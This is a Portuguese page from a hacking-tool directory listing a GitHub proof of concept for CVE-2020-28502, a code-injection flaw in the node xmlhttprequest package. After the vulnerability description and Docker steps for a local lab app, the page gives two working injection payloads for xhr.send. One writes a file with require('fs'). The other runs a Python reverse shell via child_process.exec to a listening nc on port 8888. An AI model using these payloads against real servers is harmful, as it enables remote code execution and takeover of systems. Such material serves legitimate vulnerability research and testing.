Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-28502 — CVE-2020-28502 node-XMLHttpRequest RCE | Kitploit
Ferramentas/GitHubGitHub/s-index/cve-2020-28502
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubs-index/cve-2020-28502

CVE-2020-28502

CVE-2020-28502 node-XMLHttpRequest RCE

Ver Repositório
3250há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-28502 node-XMLHttpRequest RCE

Descrição do NVD

Isso afeta o pacote xmlhttprequest antes da versão 1.7.0; todas as versões do pacote xmlhttprequest-ssl. Desde que as requisições sejam enviadas de forma síncrona (async=False no xhr.open), a entrada maliciosa do usuário que flui para xhr.send pode resultar na injeção e execução de código arbitrário.

Demonstração

cve-2020-28502

Configuração

  1. Construa uma imagem a partir de um Dockerfile
root@kitploit:~
$ docker build -t cve-2020-28502 .
  1. Execute node app.js em um novo contêiner
root@kitploit:~
$ docker run --rm -p 3000:3000 cve-2020-28502
  1. Acesse http://localhost:3000

localhost-image

PoC Payload

Adicionar arquivo

Baixar ferramenta

Enviar Payload

root@kitploit:~
\');require("fs").writeFileSync("./exploit.txt", "exploit!");req.end();//

Reverse Shell

  1. Escute o cliente
root@kitploit:~
$ nc -l 8888
  1. Enviar Payload

altere o endereço IP (192.168.0.25) para o seu endereço IP local

root@kitploit:~
\');require("child_process").exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.0.25\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'");req.end();//

Referência

  • https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935